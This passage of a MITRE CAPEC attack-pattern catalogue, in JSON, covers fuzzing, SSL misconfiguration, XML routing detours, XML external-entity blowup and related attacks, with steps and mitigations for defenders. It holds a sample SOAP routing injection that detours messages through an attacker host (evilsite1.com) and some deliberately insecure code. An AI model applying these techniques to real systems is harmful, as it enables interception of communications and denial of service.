script interpreter without first performing filtering on the content."]},"Resources_Required":{"Resource":"The adversary must have the ability to source the file of the incorrect MIME type containing a script."},"Example_Instances":{"Example":["For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file\'s real type and invokes the appropriate interpreter, scripted content could be invoked.","In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"},{"CWE_ID":"646"}]},"References":{"Reference":{"External_Reference_ID":"REF-78","Section":"Testing for Stored Cross site scripting (OWASP-DV-002)"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting Using MIME Type Mismatch",{"Date":"2017-05-01"}]}},"212":{"ID":"212","Name":"Functionality Misuse","Abstraction":"Meta","Status":"Stable","Description":"An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes."},"Skills_Required":{"Skill":["General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Gain Privileges","Note":"A successful attack of this kind can compromise the confidentiality of an authorized user\'s credentials."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Depending on the adversary\'s intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad."}]},"Mitigations":{"Mitigation":["Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.","When implementing security features, consider how they can be misused and compromised."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1242"},{"CWE_ID":"1246"},{"CWE_ID":"1281"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"215":{"ID":"215","Name":"Fuzzing for application mapping","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application\'s log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger\'s desired behavior. In this attack, the purpose of the fuzzing is to observe the application\'s log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"54"},{"Nature":"ChildOf","CAPEC_ID":"28"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application"},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.","Technique":["Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.","If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials."]}]},"Prerequisites":{"Prerequisite":"The target application must fail to sanitize incoming messages adequately before processing."},"Skills_Required":{"Skill":["Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application\'s log and/or error messages in order to collect information about the target."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["Design: Construct a \'code book\' for error messages. When using a code book, application error messages aren\'t generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value \'coding\' for the error. Such a technique will require helpdesk and hosting personnel to use a \'code book\' or similar mapping to decode application errors/logs in order to respond to them normally.","Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above \'code book\' suggestion.","Implementation: Obfuscate server fields of HTTP response.","Implementation: Hide inner ordering of HTTP response header.","Implementation: Customizing HTTP error codes such as 404 or 500.","Implementation: Hide HTTP response header software information filed.","Implementation: Hide cookie\'s software information filed.","Implementation: Obfuscate database type in Database API\'s error message."]},"Example_Instances":{"Example":[{"p":["The following code generates an error message that leaks the full pathname of the configuration file.","If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application."],"div":["$ConfigDir = \\"/home/myprog/config\\";",{"style":"margin-left:10px;","class":"bad"}]},{"p":["In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.","If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing."],"div":["public void httpGet(HttpServletRequest request, HttpServletResponse response) {",{"style":"margin-left:10px;","class":"bad","div":["try {",{"style":"margin-left:10px;","div":["processRequest();",{"style":"margin-left:10px;"},"ex.printStackTrace(response.getWriter());",{"style":"margin-left:10px;"},"return;",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"209"},{"CWE_ID":"532"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Fuzzing and observing application log data/errors for application mapping",{"Date":"2020-12-17"}]}},"216":{"ID":"216","Name":"Communication Channel Manipulation","Abstraction":"Meta","Status":"Stable","Description":"An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.","Prerequisites":{"Prerequisite":["The target application must leverage an open communications channel.","The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)."]},"Resources_Required":{"Resource":"A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":["Read Data","Modify Data","Other"],"Note":"The adversary\'s injection of additional content into a communication channel negatively impacts the integrity of that channel."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel\'s confidentiality."}]},"Mitigations":{"Mitigation":["Encrypt all sensitive communications using properly-configured cryptography.","Design the communication system such that it associates proper authentication/authorization with each channel/message."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Prerequisites"}],"Previous_Entry_Name":["Abuse of Communication Channels",{"Date":"2015-12-07"}]}},"217":{"ID":"217","Name":"Exploiting Incorrectly Configured SSL","Abstraction":"Standard","Status":"Draft","Description":"An adversary takes advantage of incorrectly configured SSL communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.","Likelihood_Of_Attack":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"216"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and indiscriminately attempt them."},{"Step":"2","Phase":"Experiment","Description":"Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one\'s self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94)."},{"Step":"3","Phase":"Exploit","Description":"Insert the malicious data into the stream that takes advantage of the configuration flaw."}]},"Prerequisites":{"Prerequisite":"Access to the client/server stream."},"Skills_Required":{"Skill":["The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles.",{"Level":"High"}]},"Resources_Required":{"Resource":"The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions."},"Example_Instances":{"Example":"Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Exploiting Incorrectly Configured SSL Security Levels",{"Date":"2015-12-07"}]}},"218":{"ID":"218","Name":"Spoofing of UDDI/ebXML Messages","Abstraction":"Detailed","Status":"Draft","Description":"An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The targeted business\'s UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit."},"Resources_Required":{"Resource":"The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services."},"Mitigations":{"Mitigation":"Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"345"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"219":{"ID":"219","Name":"XML Routing Detour Attacks","Abstraction":"Standard","Status":"Draft","Description":"An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using command line or an automated tool, an attacker records all instances of web services to process XML requests.","Technique":["Use automated tool to record all instances to process XML requests or find exposed WSDL.","Use tools to crawl WSDL"]},{"Step":"2","Phase":"Experiment","Description":"[Identify SOAP messages that have multiple state processing.] Inspect instance to see whether the XML processing has multiple stages or not.","Technique":"Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not."},{"Step":"3","Phase":"Exploit","Description":"[Launch an XML routing detour attack] The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).","Technique":"The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message"}]},"Prerequisites":{"Prerequisite":"The targeted system must have multiple stages processing of XML content."},"Skills_Required":{"Skill":["To inject a bogus node in the XML routing table",{"Level":"Low"}]},"Resources_Required":{"Resource":"The attacker must be able to insert or compromise a system into the processing path for the transaction."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.","Implementation: Use SSL for connections between all parties with mutual authentication."]},"Example_Instances":{"Example":{"p":["Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a \'end user client\' but rather the starting point of the XML transaction).","Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.","Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents)."],"div":[{"style":"margin-left:10px;","class":"informative","div":["Example SOAP message with routing information in header:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example1.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd>",{"style":"margin-left:10px;"},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]},"<r:ref xmlns:r=\\"http://schemas.example.com/referral\\">",{"style":"margin-left:10px;","div":["<r:for>",{"style":"margin-left:10px;","div":["<r:prefix>http://example2.com/router</r:prefix>",{"style":"margin-left:10px;"}]},"<r:if/>",{"style":"margin-left:10px;"},"<r:go>",{"style":"margin-left:10px;","div":["<r:via>http://example3.com/router</r:via>",{"style":"margin-left:10px;"}]}]}],"p":"Add an additional node (example3.com/router) to the XML path in a WS-Referral message"},{"style":"margin-left:10px;","class":"result","div":["Resulting in the following SOAP Header:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example1.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd>",{"style":"margin-left:10px;","div":["<m:via>http://example2.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://example3.com/router</m:via>",{"style":"margin-left:10px;"}]},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]}]},{"style":"margin-left:10px;","class":"attack","div":["Example of WS-Referral based WS-Routing injection of the bogus node route:",{"style":"color:#32498D; font-weight:bold;"},"<r:ref xmlns:r=\\"http://schemas.example.com/referral\\">",{"style":"margin-left:10px;","div":["<r:for>",{"style":"margin-left:10px;","div":["<r:prefix>http://example2.com/router</r:prefix>",{"style":"margin-left:10px;"}]},"<r:if/>",{"style":"margin-left:10px;"},"<r:go>",{"style":"margin-left:10px;","div":["<r:via>http://evilsite1.com/router</r:via>",{"style":"margin-left:10px;"}]}]}]},{"style":"margin-left:10px;","class":"result","div":["Resulting XML Routing Detour attack:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example_0.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example_4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd>",{"style":"margin-left:10px;","div":["<m:via>http://example2.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://evilesite1.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://example3.com/router</m:via>",{"style":"margin-left:10px;"}]},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"441"},{"CWE_ID":"610"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"32","Entry_Name":"Routing Detour"},{"Taxonomy_Name":"WASC","Entry_ID":"44","Entry_Name":"XML Entity Expansion"}]},"References":{"Reference":[{"External_Reference_ID":"REF-80","Section":"WASC-32 - Routing Detour"},{"External_Reference_ID":"REF-81"},{"External_Reference_ID":"REF-65"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Example_Instances"}]}},"220":{"ID":"220","Name":"Client-Server Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Prerequisites":{"Prerequisite":"The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction."},"Resources_Required":{"Resource":"The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"221":{"ID":"221","Name":"Data Serialization External Entities Blowup","Abstraction":"Detailed","Status":"Draft","Description":"This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"ChildOf","CAPEC_ID":"278"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web service] The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML."},{"Step":"2","Phase":"Experiment","Description":"[Host malicious file on a server] The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang."},{"Step":"2","Phase":"Experiment","Description":"[Craft malicious data] Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file."},{"Step":"4","Phase":"Exploit","Description":"[Send serialized data containing URI] The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack."}]},"Prerequisites":{"Prerequisite":"A server that has an implementation that accepts entities containing URI values."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.","This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally."]},"Example_Instances":{"Example":{"p":"In this example, the XML parser parses the attacker\'s XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.","div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"611"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"43","Entry_Name":"XML External Entities"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["XML External Entities",{"Date":"2018-07-31"},"XML External Entities Blowup",{"Date":"2020-07-30"}]}},"222":{"ID":"222","Name":"iFrame Overlay","Abstraction":"Detailed","Status":"Draft","Description":"In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers\' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking 